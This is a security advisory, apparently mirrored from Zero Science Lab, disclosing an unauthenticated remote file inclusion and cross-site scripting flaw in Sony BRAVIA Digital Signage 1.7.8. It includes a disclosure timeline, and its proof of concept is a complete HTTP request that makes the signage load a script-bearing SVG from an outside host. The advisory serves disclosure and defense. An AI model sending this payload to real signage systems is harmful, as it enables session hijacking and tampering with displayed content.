Lucene search

K
zeroscienceGjoko KrsticZSL-2020-5612
HistoryDec 02, 2020 - 12:00 a.m.

Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion

2020-12-0200:00:00
Gjoko Krstic
zeroscience.mk
84

6.6 Medium

AI Score

Confidence

High

Title: Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
Advisory ID: ZSL-2020-5612
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 02.12.2020

Summary

Sony’s BRAVIA Signage is an application to deliver video and still images to Pro BRAVIAs and manage the information via a network. Features include management of displays, power schedule management, content playlists, scheduled delivery management, content interrupt, and more. This cost-effective digital signage management solution is ideal for presenting attractive, informative visual content in retail spaces and hotel reception areas, visitor attractions, educational and corporate environments.

Description

BRAVIA digital signage is vulnerable to a remote file inclusion (RFI) vulnerability by including arbitrary client-side dynamic scripts (JavaScript, VBScript, HTML) when adding content though the input URL material of type html. This allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display.

Vendor

Sony Electronics Inc. - <https://pro.sony>

Affected Version

<=1.7.8

Tested On

Microsoft Windows Server 2012 R2
Ubuntu
NodeJS
Express

Vendor Status

[20.09.2020] Vulnerability discovered.
[15.10.2020] Submitted to Sony via Hackerone.
[20.11.2020] Vendor states that the vulnerabilities are just informative and that all the issues are working as intended.
[02.12.2020] Public security advisory released.

PoC

sonybravia_rfi.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/49186&gt;
[2] <https://packetstormsecurity.com/files/160345/&gt;
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/192605&gt;
[4] <https://cxsecurity.com/issue/WLB-2020120030&gt;
[5] <https://research-labs.net/search/exploits/sony-bravia-digital-signage-178-unauthenticated-remote-file-inclusion&gt;

Changelog

[02.12.2020] - Initial release
[17.12.2020] - Added reference [1], [2], [3], [4] and [5]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion


Vendor: Sony Electronics Inc.
Product web page: https://pro-bravia.sony.net
                  https://pro-bravia.sony.net/resources/software/bravia-signage/
                  https://pro.sony/ue_US/products/display-software
Affected version: &lt;=1.7.8

Summary: Sony's BRAVIA Signage is an application to deliver
video and still images to Pro BRAVIAs and manage the information
via a network. Features include management of displays, power
schedule management, content playlists, scheduled delivery
management, content interrupt, and more. This cost-effective
digital signage management solution is ideal for presenting
attractive, informative visual content in retail spaces and
hotel reception areas, visitor attractions, educational and
corporate environments.

Desc: BRAVIA digital signage is vulnerable to a remote file
inclusion (RFI) vulnerability by including arbitrary client-side
dynamic scripts (JavaScript, VBScript, HTML) when adding content
though the input URL material of type html. This allows hijacking
the current session of the user, execute cross-site scripting code
or changing the look of the page and content modification on current
display.

Tested on: Microsoft Windows Server 2012 R2
           Ubuntu
           NodeJS
           Express


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5612
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php


20.09.2020

--


Request:
--------

POST /api/content-creation?type=create&amp;id=174ace2f9371b4 HTTP/1.1
Host: 192.168.1.20:8080
Proxy-Connection: keep-alive
Content-Length: 468
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.1.20:8080
Referer: http://192.168.1.20:8080/test.txt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: io=RslVZVH6Dc8WsOn5AAAJ

{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}
</p></body></html>

6.6 Medium

AI Score

Confidence

High